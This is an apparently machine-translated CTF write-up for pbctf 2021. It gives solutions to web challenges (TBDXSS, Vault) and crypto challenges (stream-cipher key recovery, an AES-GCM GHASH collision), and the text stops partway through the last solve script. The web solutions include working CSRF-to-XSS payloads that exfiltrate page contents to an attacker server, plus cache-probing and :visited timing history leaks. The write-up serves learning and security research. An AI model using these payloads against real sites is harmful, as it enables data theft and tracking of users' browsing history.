pbctf 1 WriteUps

發表於
分類於 CTF

This article is automatically translated by LLM, so the translation may be inaccurate or incomplete. If you find any mistake, please let me know.
You can find the original article here .

This time, I participated in pbctf 2021 under the name of the nyahello team as a solo player. In the crypto section, only one problem remained unsolved, while in the web section, I solved two problems and, along with the easy misc problem, achieved 15th place. As expected, the problems created by the first-place Perfect Blue team were really challenging.

  Scoreboard Screenshot

Problems with a * in their titles indicate that I solved them after the competition.

Web

TBDXSS

from flask import Flask, request, session, jsonify, Response
import json
import redis
import random
import os
import time

app = Flask(__name__)
app.secret_key = os.environ.get("SECRET_KEY", "tops3cr3t")

app.config.update(
    SESSION_COOKIE_SECURE=True,
    SESSION_COOKIE_HTTPONLY=True,
    SESSION_COOKIE_SAMESITE='Lax',
)

HOST = os.environ.get("CHALL_HOST", "localhost:5000")

r = redis.Redis(host='redis')

@app.after_request
def add_XFrame(response):
    response.headers['X-Frame-Options'] = "DENY"
    return response


@app.route('/change_note', methods=['POST'])
def add():
    session['note'] = request.form['data']
    session.modified = True
    return "Changed succesfully"

@app.route("/do_report", methods=['POST'])
def do_report():
    cur_time = time.time()
    ip = request.headers.get('X-Forwarded-For').split(",")[-2].strip() #amazing google load balancer

    last_time = r.get('time.'+ip) 
    last_time = float(last_time) if last_time is not None else 0
    
    time_diff = cur_time - last_time

    if time_diff > 6:
        r.rpush('submissions', request.form['url'])
        r.setex('time.'+ip, 60, cur_time)
        return "submitted"

    return "rate limited"

@app.route('/note')
def notes():
    print(session)
    return """
<body>
{}
</body>
    """.format(session['note'])

@app.route("/report", methods=['GET'])
def report():
    return """
<head>
    <title>Notes app</title>
</head>
<body>
    <h3><a href="/note">Get Note</a>&nbsp;&nbsp;&nbsp;<a href="/">Change Note</a>&nbsp;&nbsp;&nbsp;<a href="/report">Report Link</a></h3>
        <hr>
        <h3>Please report suspicious URLs to admin</h3>
        <form action="/do_report" id="reportform" method=POST>
        URL: <input type="text" name="url" placeholder="URL">
        <br>
        <input type="submit" value="submit">
        </form>
    <br>
</body>
    """

@app.route('/')
def index():
    return """
<head>
    <title>Notes app</title>
</head>
<body>
    <h3><a href="/note">Get Note</a>&nbsp;&nbsp;&nbsp;<a href="/">Change Note</a>&nbsp;&nbsp;&nbsp;<a href="/report">Report Link</a></h3>
        <hr>
        <h3> Add a note </h3>
        <form action="/change_note" id="noteform" method=POST>
        <textarea rows="10" cols="100" name="data" form="noteform" placeholder="Note's content"></textarea>
        <br>
        <input type="submit" value="submit">
        </form>
    <br>
</body>
    """

The above is the core part of the code for this problem. The target XSS bot will carry a session containing the flag when it visits, so the flag will be directly displayed when visiting /note. This problem can be easily solved using CSRF to POST to /change_note to achieve XSS, but since the flag in the session is overwritten, XSS is useless.

What gave me the idea for the solution was the line response.headers['X-Frame-Options'] = "DENY" which prevents iframes. After thinking about it, I realized that I could use two iframes on my own page: one to load the flag from /note and another to trigger the XSS. Then, I could access the content with the flag from the iframe with XSS using top.frames.

Although this problem prohibits iframes, window.open has a similar effect. By opening a new tab with _blank, the returned object from window.open will be the window object of the new tab. The newly opened tab can also access the window of the original tab that called window.open using window.opener. This way, we can achieve the same result as described earlier.

Since we don't have frames to use this time, how can we get the appropriate window object? My approach was to open two tabs on one page: one for CSRF to XSS and another to delay and then open /note to trigger XSS. The original page would then redirect to /note. This way, you can find the window with the flag on the window.opener chain of the tab with XSS, and thus obtain the flag.

index.php:

Since the XSS bot stops at the load event, we need to block it, and the real payload is in the new tab's main.php.

<script>
open(location.href + 'main.php', '_blank')
</script>
<img src="https://deelay.me/20000/https://example.com">

main.php:

This is the main page, which opens two tabs and then redirects to the /note page with the flag.

<script>
open(location.href.replace('main', 'submit'), '_blank')
open(location.href.replace('main', 'opennote'), '_blank')
location.href = 'https://tbdxss.chal.perfect.blue/note'
</script>

submit.php:

A standard CSRF

<form action="https://tbdxss.chal.perfect.blue/change_note" method="POST" id=f>
<input name="data" value="peko">
</form>
<script>
f.data.value = '<script>const report = t => fetch("https://YOUR_SERVER/xss.php", {method: "POST", body: t}); report(window.opener.opener.document.body.textContent)</'+'script>'
f.submit()
</script>

opennote.php:

After a delay, it opens the /note page with XSS in a new tab. Since it's in a new tab, the XSS needs to use window.opener.opener to access the original main.php that redirected to /note.

<script>setTimeout(() => { open('https://tbdxss.chal.perfect.blue/note', '_blank') }, 1000)</script>

Flag: pbctf{g1t_m3_4_p4g3_r3f3r3nc3}

Vault

#!/usr/bin/env python3

import os
import socket


from flask import Flask
from flask import render_template
from flask import request

from flask_caching import Cache
from flask_recaptcha import ReCaptcha

app = Flask(__name__)
app.config["RECAPTCHA_SITE_KEY"] = os.environ["RECAPTCHA_SITE_KEY"]
app.config["RECAPTCHA_SECRET_KEY"] = os.environ["RECAPTCHA_SECRET_KEY"]
recaptcha = ReCaptcha(app)

cache = Cache(config={'CACHE_TYPE': 'FileSystemCache', 'CACHE_DIR':'/tmp/vault', 'CACHE_DEFAULT_TIMEOUT': 300})
cache.init_app(app)

@app.route("/<path:vault_key>", methods=["GET", "POST"])
def vault(vault_key):
    parts = list(filter(lambda s: s.isdigit(), vault_key.split("/")))
    level = len(parts)
    if level > 15:
        return "Too deep", 422

    if not cache.get("vault"):
        cache.set("vault", {})

    main_vault = cache.get("vault")

    c = main_vault
    for v in parts:
        c = c.setdefault(v, {})
    
    values = c.setdefault("values", [])

    if level > 8 and request.method == "POST":
         value = request.form.get("value")
         value = value[0:50]
         values.append(value)

    cache.set("vault", main_vault)
    return render_template("vault.html", values = values, level = level)

@app.route("/", methods=["GET", "POST"])
def main():
    if request.method == "GET":
        return render_template("main.html")
    else:
        if recaptcha.verify():
            url = request.form.get("url")
            if not url:
                return "The url parameter is required", 422
            if not url.startswith("https://") and not url.startswith("http://"):
                return "The url parameter is invalid", 422


            s = socket.create_connection(("bot", 8000))
            s.sendall(url.encode())
            resp = s.recv(100)
            s.close()

            return resp.decode(), 200
        else:
            return "Invalid captcha", 422

The above is the core part of the code for this problem. There is a path /12/24/8/31/.../ that allows you to write content into it, without XSS. A bot will first browse this website (http://vault.chal.perfect.blue/), then randomly click fourteen layers deep into a path with fourteen layers, submit the flag on that page, and visit any website you specify:

async function click_vault(page, i) {
  const vault = `a.vault-${i}`;
  const elem = await page.waitForSelector(vault, { visible: true });
  await Promise.all([page.waitForNavigation(), elem.click()]);
}

async function add_flag_to_vault(browser, url) {
  if (!url || url.indexOf("http") !== 0) {
    return;
  }
  const page = await browser.newPage();

  try {
    await page.goto(vaultUrl);

    for (let i = 0; i < 14; i++) {
      await click_vault(page, crypto.randomInt(1, 33));
    }
    await page.type("#value", FLAG);
    await Promise.all([page.waitForNavigation(), page.click("#submit")]);

    await page.goto(url);
    await new Promise((resolve) => setTimeout(resolve, 30 * 1000));
  } catch (e) {
    console.log(e);
  }
  await page.close();
}

The goal of this problem is to find a way to obtain the URL of the page the bot was on before browsing your page, and then you can get the flag. The method is obviously related to XS-Leaks and Cache Probing, which uses the browser's cache to check if a URL has been visited. The simplest method is to use await fetch(url, { 'cache': 'force-cache' }) and measure the time it takes to determine if it has been cached.

If you test this on your own page, you'll find it doesn't work, but it works on pages under the chal.perfect.blue domain. This is because modern browsers generally have Cache Partitioning to separate the cache by origin, preventing cache-based URL tracking.

My approach was to use the fact that the domain for TBDXSS is tbdxss.chal.perfect.blue, which shares the same cache as vault.chal.perfect.blue. Testing with fetch also yielded the expected results, so using XSS on TBDXSS for Cache Probing should work.

However, a difficulty arises because TBDXSS's cookies are secure due to SESSION_COOKIE_SECURE=True, meaning they only work under https. But the bot's cache is under http://vault.chal.perfect.blue/. Accessing http from an https page will be blocked by the browser, resulting in a Mixed Content warning.

I noticed that if you set document.cookie = 'session=xxxx; path=/note' on an https page and then visit http://tbdxss.chal.perfect.blue/note, the cookie is still sent, achieving our goal. The value of xxxx can be easily obtained by POSTing your payload to the TBDXSS server.

index.html:

Opens two pages: one for CSRF to submit the XSS payload to TBDXSS, and another to delay and then open TBDXSS's /note page to trigger XSS.

<body>
    <script>
        open(location.href + 'submit.php', '_blank')
        open(location.href + 'opennote.php', '_blank')
    </script>
</body>

opennote.php:

Same as the previous problem

<script>setTimeout(() => { open('https://tbdxss.chal.perfect.blue/note', '_blank') }, 1000)</script>

submit.php:

Reads the file from xss.js, POSTs it to get the corresponding session cookie, generates an XSS payload to set document.cookie, then redirects to the http version of the page to execute the real second-stage XSS in xss.js.

<?php
$xss = file_get_contents('xss.js');
$payload = '<script>'.$xss.'</script>';
$ch = curl_init('https://tbdxss.chal.perfect.blue/change_note');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'data' => $payload
]));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);


function onHeader( $curl, $header_line ) {
    global $sess;
    if(strpos($header_line, 'session=') !== false){
        $sess = explode(';', explode('session=', $header_line)[1])[0];
    }
    return strlen($header_line);
}

curl_setopt($ch, CURLOPT_HEADERFUNCTION, "onHeader");
$response = curl_exec($ch);

$js = 'document.cookie = "session=" + '.json_encode($sess).'+ "; path=/note"; location.href = "http://tbdxss.chal.perfect.blue/note";';
?>
<form action="https://tbdxss.chal.perfect.blue/change_note" method="POST" id=f>
<textarea name="data"></textarea>
</form>
<script>
f.data.value = "SET COOKIE<script>" + <?= json_encode($js) ?> + "</" + "script>"
f.submit()
</script>

xss.js:

This part is the real Cache Probing code. It was found that the fetch time for cached pages is less than 5ms, so recursively brute-forcing the path works.

const report = s => fetch(location.protocol + '//YOUR_SERVER/report.php', { method: 'POST', body: s })
const getLoadTime = async url => {
	const start = performance.now()
	await fetch(url, { cache: 'force-cache', mode: 'no-cors' })
	return performance.now() - start
}
const buildUrl = parts => location.protocol + '//vault.chal.perfect.blue/' + parts.join('/') + '/'
window.onload = async () => {
	try {
		for (let i = 0; i < 5; i++) {
			// warmup
			await getLoadTime(location.protocol + '//vault.chal.perfect.blue/')
		}
		const brute = async parts => {
			for (let i = 1; i <= 32; i++) {
				const t = await getLoadTime(buildUrl(parts.concat([i])))
				if (t < 5) {
					const nextParts = parts.concat([i])
					report(buildUrl(nextParts))
					return brute(nextParts)
				}
			}
		}
		await brute([])
	} catch (e) {
		report(e.toString())
	}
}
report('sancheck: ' + location.href)

Finally, due to some unknown reasons, it can only find 14-1=13 layers of the path. This can be easily solved by writing a Python script to brute-force the last layer:

import requests

url = "http://vault.chal.perfect.blue/11/30/24/5/30/3/4/2/30/7/16/32/9/"

for i in range(1, 33):
    r = requests.get(f"{url}{i}/")
    if "pbctf" in r.text:
        print(f"{url}{i}/", r.text)

# http://vault.chal.perfect.blue/11/30/24/5/30/3/4/2/30/7/16/32/9/26/
# pbctf{who_knew_that_history_was_not_so_private}

The URL in this script may not work because multiple instances were added later, so it might be on other instances.

Intended Solution

However, my approach seems to be unintended. The intended solution is to use :visited to leak whether a link has been visited.

The author's solution is as follows:

<!DOCTYPE html>
<html>

<!--
Visited links are known to be leaky, see

https://bugs.chromium.org/p/chromium/issues/detail?id=713521
https://bugs.chromium.org/p/chromium/issues/detail?id=1247907

Can use requestAnimationFrame and requestIdleCallback to reliably check when a links :visited status changes

--> 
<head>
    <style>
        #link {
            position: absolute;
            top: 0;
            opacity: 0.001;
            pointer-events: none;
        }

        a {
            display: block;
        }

        .container {
            display: grid;
            grid-template-columns: 1fr 1fr;
        }

        .links {
            width: 30vw;
        }
    </style>
</head>

<body>
    <a id="link" href=""></a>

    <div class="container">
        <div class="links">
            <h2>Visited links</h2>
            <hr>
            <div id="seen"></div>
        </div>
        <div class="links">
            <h2>Unvisted links</h2>
            <hr>
            <div id="unseen"></div>
        </div>
    </div>

    <script>
        // const VAULT_URL = "http://localhost:5000/";
        const VAULT_URL = "http://web:5000/";

        const link = document.getElementById("link");
        const seen = document.getElementById("seen");
        const unseen = document.getElementById("unseen");

        async function getLinkTime(url) {
            let t1, t2 = 0;
            await new Promise((resolve) => {
                requestAnimationFrame(() => {
                    t1 = performance.now();
                    link.href = url;
                    requestIdleCallback(() => {
                        t2 = performance.now()
                        resolve();
                    }, { timeout: 1000 });
                });
            });
            return t2 - t1;
        }

        async function hasLinkBeenVisited(url) {
            await getLinkTime("");
            const urlTime = await getLinkTime(url);
            const urlTimeUnvisited = await getLinkTime(url + "?" + performance.now())
            return urlTimeUnvisited > urlTime;
        }

        async function checkUrl(url) {
            const a = document.createElement("a");
            a.href = url;
            a.innerText = url;

            if (await hasLinkBeenVisited(url)) {
                seen.prepend(a);
                return true;
            } else {
                unseen.prepend(a);
                return false;
            }
        }

        async function setup() {
            link.innerText = "aa ".repeat(0x10000);

            let base = VAULT_URL;

            while (true) {
                let found = false;
                const urls = [];
                for (let i = 0; i < 33; i++) {
                    urls.push(`${base}${i}/`)
                }
                urls.push("http://adsfadsfadf.com");
                for (const url of urls) {
                    if (await checkUrl(url)) {
                        base = url;
                        found = true;
                        break;
                    }
                }
                if (!found) {
                    break;
                }
            }

            await fetch("http://aw.rs?" + base)
        }
        setup()
    </script>
</body>

</html>

Browsers display links with different colors depending on whether they have been visited. For example, in Chromium, the default colors are blue for unvisited and purple for visited. Theoretically, if you can obtain the color, you can determine if a person has visited a URL, and getComputedStyle indeed allows you to access an element's color.

However, as mentioned in its documentation, for privacy reasons, it won't let you distinguish the color after :visited, so it always returns the color for unvisited links.

The author's solution uses an a#link element with a fixed position and near-transparent opacity. Initially, it inserts a large amount of text ("aa ".repeat(0x10000)) into it.

If you change the href, the browser will update the :visited status. If the color changes, it means re-rendering is required. Since there is a large amount of text, it takes more time to re-render. By measuring the time the browser takes to re-render, you can leak some information.

In my tests on Chrome 94, the time difference between an unvisited and visited link is about 0.1 vs 3~5ms.

getLinkTime first uses requestAnimationFrame, which is called before the browser repaints. It records the time t1 and updates the href in the callback, then registers another callback with requestIdleCallback. When the second callback is called, it resolves performance.now() - t1, representing the time the browser took to handle the href update.

It may include some additional processing time, but it can be ignored as a minor error.

hasLinkBeenVisited first uses getLinkTime("") to set the href to an empty string, ensuring it renders completely before continuing. This ensures the link's color is purple (same as :visited). Then, it gets the urlTime for the target URL using getLinkTime, and another time urlTimeUnvisited for a URL that ensures no :visited.

If the URL is :visited, the color change will be purple->purple->blue; otherwise, it will be purple->blue->blue. We know the time required for a color change is much greater than the time required for no change, so if urlTime < urlTimeUnvisited, it means the URL is :visited.

Using this time difference, you can brute-force the target path and get the flag.

I also tried this experiment on Firefox. The first difficulty is that Firefox's default performance.now() precision is only at the millisecond level, making it hard to get more accurate times. Another issue is that getLinkTime in Firefox, for some unknown reason, doesn't accurately measure the time required to change the href as precisely as Chromium. After adding some additional code, I could only get the first digit of the path with high probability, but it failed for the second digit and beyond.

Crypto

Alkaloid Stream

#!/usr/bin/env python3

import random
from flag import flag

def keygen(ln):
    # Generate a linearly independent key
    arr = [ 1 << i for i in range(ln) ]

    for i in range(ln):
        for j in range(i):
            if random.getrandbits(1):
                arr[j] ^= arr[i]
    for i in range(ln):
        for j in range(i):
            if random.getrandbits(1):
                arr[ln - 1 - j] ^= arr[ln - 1 - i]

    return arr

def gen_keystream(key):
    ln = len(key)
    
    # Generate some fake values based on the given key...
    fake = [0] * ln
    for i in range(ln):
        for j in range(ln // 3):
            if i + j + 1 >= ln:
                break
            fake[i] ^= key[i + j + 1]

    # Generate the keystream
    res = []
    for i in range(ln):
        t = random.getrandbits(1)
        if t:
            res.append((t, [fake[i], key[i]]))
        else:
            res.append((t, [key[i], fake[i]]))

    # Shuffle!
    random.shuffle(res)

    keystream = [v[0] for v in res]
    public = [v[1] for v in res]
    return keystream, public

def xor(a, b):
    return [x ^ y for x, y in zip(a, b)]

def recover_keystream(key, public):
    st = set(key)
    keystream = []
    for v0, v1 in public:
        if v0 in st:
            keystream.append(0)
        elif v1 in st:
            keystream.append(1)
        else:
            assert False, "Failed to recover the keystream"
    return keystream

def bytes_to_bits(inp):
    res = []
    for v in inp:
        res.extend(list(map(int, format(v, '08b'))))
    return res

def bits_to_bytes(inp):
    res = []
    for i in range(0, len(inp), 8):
        res.append(int(''.join(map(str, inp[i:i+8])), 2))
    return bytes(res)

flag = bytes_to_bits(flag)

key = keygen(len(flag))
keystream, public = gen_keystream(key)
assert keystream == recover_keystream(key, public)
enc = bits_to_bytes(xor(flag, keystream))

print(enc.hex())
print(public)

You can see it first converts the flag into bits, then generates a linearly independent key of the same length. It then uses the key to generate some fake values, randomly generates a keystream, and encrypts the flag with XOR. The public is generated by swapping the order of key and fake based on each bit of the keystream, so to recover the keystream, we need to find a way to distinguish between key and fake without knowing the key.

Let's first replace the key with the basic values 1,2,4,...,512 to observe:

['0000000001', '0000000010', '0000000100', '0000001000', '0000010000', '0000100000', '0001000000', '0010000000', '0100000000', '1000000000']
['0000001110', '0000011100', '0000111000', '0001110000', '0011100000', '0111000000', '1110000000', '1100000000', '1000000000', '0000000000']

The above list is the binary representation of the key, and the list below is the corresponding binary representation of the fake. We can observe that each fake is the XOR of the last k key values. If there are fewer than k remaining key values, they are ignored, so fake[-1] == 0 always holds. (where k = len(key) // 3)

Since we know from the key generation method that the key will not contain 0, any 0 must be a fake, allowing us to determine one key value. With one key value, we can use a similar method to find another fake value, then recover the second key, and so on, until we recover all the key values.

import ast
from functools import reduce
from operator import xor

with open("output.txt") as f:
    ct = bytes.fromhex(f.readline().strip())
    public = ast.literal_eval(f.readline().strip())

window = len(public) // 3
print(window)
PT = list(zip(*public))  # transpose
rkey = []

fakei = -1
xk = 0  # the last element of fake is always 0

while len(rkey) != len(public):
    if xk in PT[0] and PT[0].index(xk) != fakei:
        ROW = False
    else:
        ROW = True
    fakei = PT[ROW].index(xk)
    k = PT[not ROW][fakei]
    rkey.append(k)
    print(fakei)
    xk = reduce(xor, rkey[-window:])

key = rkey[::-1]


def recover_keystream(key, public):
    st = set(key)
    keystream = []
    for v0, v1 in public:
        if v0 in st:
            keystream.append(0)
        elif v1 in st:
            keystream.append(1)
        else:
            assert False, "Failed to recover the keystream"
    return keystream


def bits_to_bytes(inp):
    res = []
    for i in range(0, len(inp), 8):
        res.append(int("".join(map(str, inp[i : i + 8])), 2))
    return bytes(res)


ks = recover_keystream(key, public)
print(bytes(a ^ b for a, b in zip(ct, bits_to_bytes(ks))))

# pbctf{super_duper_easy_brute_forcing_actually_this_one_was_made_by_mistake}

The k mentioned earlier is called window in this code.

Steroid Stream

#!/usr/bin/env python3

import random
from flag import flag

def keygen(ln):
    # Generate a linearly independent key
    arr = [ 1 << i for i in range(ln) ]

    for i in range(ln):
        for j in range(i):
            if random.getrandbits(1):
                arr[j] ^= arr[i]
    for i in range(ln):
        for j in range(i):
            if random.getrandbits(1):
                arr[ln - 1 - j] ^= arr[ln - 1 - i]

    return arr

def gen_keystream(key):
    ln = len(key)
    assert ln > 50
    
    # Generate some fake values based on the given key...
    fake = [0] * ln
    for i in range(ln - ln // 3):
        arr = list(range(i + 1, ln))
        random.shuffle(arr)
        for j in arr[:ln // 3]:
            fake[i] ^= key[j]

    # Generate the keystream
    res = []
    for i in range(ln):
        t = random.getrandbits(1)
        if t:
            res.append((t, [fake[i], key[i]]))
        else:
            res.append((t, [key[i], fake[i]]))

    # Shuffle!
    random.shuffle(res)

    keystream = [v[0] for v in res]
    public = [v[1] for v in res]
    return keystream, public

def xor(a, b):
    return [x ^ y for x, y in zip(a, b)]

def recover_keystream(key, public):
    st = set(key)
    keystream = []
    for v0, v1 in public:
        if v0 in st:
            keystream.append(0)
        elif v1 in st:
            keystream.append(1)
        else:
            assert False, "Failed to recover the keystream"
    return keystream

def bytes_to_bits(inp):
    res = []
    for v in inp:
        res.extend(list(map(int, format(v, '08b'))))
    return res

def bits_to_bytes(inp):
    res = []
    for i in range(0, len(inp), 8):
        res.append(int(''.join(map(str, inp[i:i+8])), 2))
    return bytes(res)

flag = bytes_to_bits(flag)

key = keygen(len(flag))
keystream, public = gen_keystream(key)
assert keystream == recover_keystream(key, public)
enc = bits_to_bytes(xor(flag, keystream))

print(enc.hex())
print(public)

This problem is similar to the previous one, but the generation of fake values has been modified. It fixes k fake values to 0, but the remaining fake values are the XOR of k key values.

XOR can be represented as addition in F2\mathbb{F}_2, and more bits are just vector addition in F2n\mathbb{F}_2^n. (n = len(public))

First, using the fact that k fake values are 0, we can obtain one-third of the key. According to the fake generation method, at least one of the remaining unknown fake values is a linear combination of the known key values. This can be solved using Sage's solve_left to check if the number of 1s in the solution vector matches k.

Using this method, we can implement the solution. However, it takes a lot of time to run. On my computer, it took about an hour to find the solution:

import ast
from sage.all import GF, vector, matrix, ZZ
from tqdm import tqdm

with open("output.txt") as f:
    ct = bytes.fromhex(f.readline().strip())
    public = ast.literal_eval(f.readline().strip())

window = len(public) // 3
print(window)
PT = list(zip(*public))  # transpose
l = len(public)


def findpt(cond):
    for i in range(l):
        if cond(PT[0][i]):
            yield 0, i
        elif cond(PT[1][i]):
            yield 1, i


def bink(x, k):
    return bin(x)[2:].rjust(k, "0")


F = GF(2)


def int2vec(x, bits=len(public)):
    v = vector(F, map(int, bink(x, bits)))
    v.set_immutable()
    return v


def vec2int(v):
    return int("".join(map(str, v)), 2)


def is_in_span(M, t, k):
    try:
        r = M.solve_left(t)
        return sum(r.change_ring(ZZ)) == k
    except ValueError:
        return False


rkey = set()
for r, i in findpt(lambda x: x == 0):
    rkey.add(int2vec(PT[not r][i]))

pbar = tqdm(total=len(public))
pbar.n = len(rkey)
pbar.refresh()
while len(rkey) != len(public):
    M = matrix(rkey)

    def check(x):
        return is_in_span(M, int2vec(x), window)

    for r, i in findpt(check):
        rkey.add(int2vec(PT[not r][i]))
    pbar.n = len(rkey)
    pbar.refresh()
    print(len(rkey))

rkey = set(vec2int(v) for v in rkey)

key = list(rkey)


def recover_keystream(key, public):
    st = set(key)
    keystream = []
    for v0, v1 in public:
        if v0 in st:
            keystream.append(0)
        elif v1 in st:
            keystream.append(1)
        else:
            assert False, "Failed to recover the keystream"
    return keystream


def bits_to_bytes(inp):
    res = []
    for i in range(0, len(inp), 8):
        res.append(int("".join(map(str, inp[i : i + 8])), 2))
    return bytes(res)


ks = recover_keystream(key, public)
print(bytes(a ^ b for a, b in zip(ct, bits_to_bytes(ks))))

# takes ~1hr to run...
# pbctf{I_hope_you_enjoyed_this_challenge_now_how_about_playing_Metroid_Dread?}

However, the intended solution's algorithm seems to be much better and faster. It is related to this, but I don't understand it :(

GoodHash

#!/usr/bin/env python3

from Crypto.Cipher import AES
from Crypto.Util.number import *
from flag import flag
import json
import os
import string

ACCEPTABLE = string.ascii_letters + string.digits + string.punctuation + " "


class GoodHash:
    def __init__(self, v=b""):
        self.key = b"goodhashGOODHASH"
        self.buf = v

    def update(self, v):
        self.buf += v

    def digest(self):
        cipher = AES.new(self.key, AES.MODE_GCM, nonce=self.buf)
        enc, tag = cipher.encrypt_and_digest(b"\0" * 32)
        return enc + tag

    def hexdigest(self):
        return self.digest().hex()


if __name__ == "__main__":
    token = json.dumps({"token": os.urandom(16).hex(), "admin": False})
    token_hash = GoodHash(token.encode()).hexdigest()
    print(f"Body: {token}")
    print(f"Hash: {token_hash}")

    inp = input("> ")
    if len(inp) > 64 or any(v not in ACCEPTABLE for v in inp):
        print("Invalid input :(")
        exit(0)

    inp_hash = GoodHash(inp.encode()).hexdigest()

    if token_hash == inp_hash:
        try:
            token = json.loads(inp)
            if token["admin"] == True:
                print("Wow, how did you find a collision?")
                print(f"Here's the flag: {flag}")
            else:
                print("Nice try.")
                print("Now you need to set the admin value to True")
        except:
            print("Invalid input :(")
    else:
        print("Invalid input :(")

This problem generates a fixed JSON, then uses a custom GoodHash function to calculate the hash. You need to provide another JSON with the same hash, and it must have admin: true after parsing.

The GoodHash function is simple. It uses the hash data as the nonce for AES-GCM, with a fixed known key, and the output after encrypting two blocks of all zeros is the hash output.

In pycryptodome's GCM implementation, you can see this:

# Step 2 - Compute J0
if len(self.nonce) == 12:
    j0 = self.nonce + b"\x00\x00\x00\x01"
else:
    fill = (16 - (len(nonce) % 16)) % 16 + 8
    ghash_in = (self.nonce +
                b'\x00' * fill +
                long_to_bytes(8 * len(nonce), 8))

    j0 = _GHASH(hash_subkey, ghash_c).update(ghash_in).digest()

# Step 3 - Prepare GCTR cipher for encryption/decryption
nonce_ctr = j0[:12]
iv_ctr = (bytes_to_long(j0) + 1) & 0xFFFFFFFF

Here, j0 is the actual IV used as the GCM counter, so as long as two nonces produce the same j0, the entire GoodHash will collide, making the goal to find a collision for the GHASH function.

pycryptodome's GCM implementation is based on this document. In section 6.4, there is a pseudo code for the GHASH function. This function can be expressed simply using GF(28)\mathbb{GF}(2^8) arithmetic:

GHASH(H,X)=i=1nXiHn+1i\operatorname{GHASH}(H,X)=\sum_{i=1}^{n} X_i H^{n+1-i}

Where HH is a fixed value corresponding to the hash_subkey, and XX is the input blocks, i.e., ghash_in, which is the padded nonce. The hash_subkey is obtained by encrypting a block of zeros with AES-ECB using the same key.

To find a simple collision, assume we have a fixed message X1X2X_1||X_2 with hash TT, and we want to find X1X2X_1'||X_2' with the same hash:

X1H2+X2H=TX1H2+X2H=T\begin{aligned} X_1 H^2 + X_2 H &= T \\ X_1' H^2 + X_2' H &= T \end{aligned}

So (X1X1)H2+(X2X2)H=0(X_1 - X_1')H^2+(X_2 - X_2')H=0. Setting X1=X1+1X_1'=X_1+1 and X2=X2+HX_2'=X_2+H will find one of the collisions.

However, our desired collision is more complex, requiring specific characters and a valid JSON. The token, after padding, can be divided into five blocks:

[b'{"token": "b3ea9', b'0a7b48bc6464fa63', b'xxxxxxxxxxx", "a', b'dmin": false}\x00\x00\x00', b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xe8']

We need to control blocks[3] == b'dmin": true }\x00\x00\x00' and adjust the other blocks to maintain the same hash.

X1H5+X2H4+X3H3+X4H2+X5H1=TX_1 H^5 + X_2 H^4 + X_3 H^3 + X_4 H^2 + X_5 H^1 = T

Adjusting blocks[3] means changing X4X_4 to X4+CX_4 + C, so other XX values need adjustments to maintain equality. Assume the adjustments to X2X_2 and X3X_3 are AA and BB, then:

AH4+BH3+CH2=0C=AH2+BHA H^4 + B H^3 + C H^2 = 0 \rightarrow C = A H^2 + BH

Any A,B,CA,B,C adjustments satisfying the above equation will have the same hash. However, we need adjustments that result in ACCEPTABLE and legal JSON.

My approach was to notice that blocks[2] partially contains JSON format, but blocks[1] allows arbitrary changes. So, I generated blocks[2] == b'xxxxxxxxxxxx","a' with random ACCEPTABLE characters. This gives BB, then calculate A=CBHH2A=\frac{C-BH}{H^2}, convert X2+AX_2+A back to bytes, and check if all characters are ACCEPTABLE. If it fails, try again.

from Crypto.Cipher import AES
from Crypto.Util.number import *
from sage.all import GF, PolynomialRing
import json
import os
import string
import random

ACCEPTABLE = (string.ascii_letters + string.digits + string.punctuation + " ").encode()


class GoodHash:
    def __init__(self, v=b""):
        self.key = b"goodhashGOODHASH"
        self.buf = v

    def update(self, v):
        self.buf += v

    def digest(self):
        cipher = AES.new(self.key, AES.MODE_GCM, nonce=self.buf)
        enc, tag = cipher.encrypt_and_digest(b"\0" * 32)
        return enc + tag

    def hexdigest(self):
        return self.digest().hex()


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


subkey = AES.new(b"goodhashGOODHASH", AES.MODE_ECB).encrypt(b"\0" * 16)


# GF(2^128) utility functions are copied and modified from https://github.com/bozhu/AES-GCM-Python/blob/master/test_gf_mul.sage

x = PolynomialRing(GF(2), "x").gen()
F = GF(2 ** 128, "a", x ** 128 + x ** 7 + x ** 2 + x + 1)
a = F.gen()


def int2ele(integer):
    res = 0
    for i in range(128):
        # rightmost bit is x127
        res += (integer & 1) * (a ** (127 - i))
        integer >>= 1
    return res


def bytes2ele(b):
    return int2ele(bytes_to_long(b))


def ele2int(element):
    integer = element.integer_representation()
    res = 0
    for _ in range(128):
        res = (res << 1) + (integer & 1)
        integer >>= 1
    return res


def ele2bytes(ele):
    return long_to_bytes(ele2int(ele), 16)


def ghash(H, XS):
    # H: ele
    # XS: ele[]
    Y = int2ele(0)
    for X in XS:
        Y = (Y + X) * H
    return Y


def pad(b: bytes):
    fill = (16 - (len(b) % 16)) % 16 + 8
    ghash_in = b + b"\x00" * fill + long_to_bytes(8 * len(b), 8)
    return ghash_in


def to_blocks(b: bytes, sz=16):
    return [b[i : i + sz] for i in range(0, len(b), 16)]


def find_collision(token, max_attempt=2 ** 14):
    H = bytes2ele(subkey)
    blocks = to_blocks(pad(token))
    assert len(blocks) == 5
    C = bytes2ele(b'dmin": true }\x00\x00\x00') + bytes2ele(blocks[3])
    new_blocks = list(blocks)
    new_blocks[3] = ele2bytes(bytes2ele(new_blocks[3]) + C)
    ele2 = bytes2ele(new_blocks[2])
    ele1 = bytes2ele(new_blocks[1])
    H2 = H * H
    for _ in range(max_attempt):
        B = bytes2ele(bytes(random.sample(ACCEPTABLE, 12)) + b'","a') - ele2
        A = (C - B * H) / H2
        bA = ele2bytes(ele1 + A)
        if all(x in ACCEPTABLE for x in bA):
            break
    else:
        return
    assert A * H ** 2 + B * H == C
    new_blocks[1] = ele2bytes(bytes2ele(new_blocks[1]) + A)
    new_blocks[2] = ele2bytes(bytes2ele(new_blocks[2]) + B)
    fake_token = b"".join(new_blocks)[:-2].strip(b"\0")
    assert GoodHash(fake_token).digest() == GoodHash(token).digest()
    return fake_token


def main():
    from pwn import remote, context

    context.log_level = "error"

    while True:
        # io = process(["python", "main.py"])
        io = remote("good-hash.chal.perfect.blue", 1337)
        io.recvuntil(b"Body: ")
        token = io.recvline().strip()
        io.recvuntil(b"Hash: ")
        hexhash = io.recvlineS().strip()
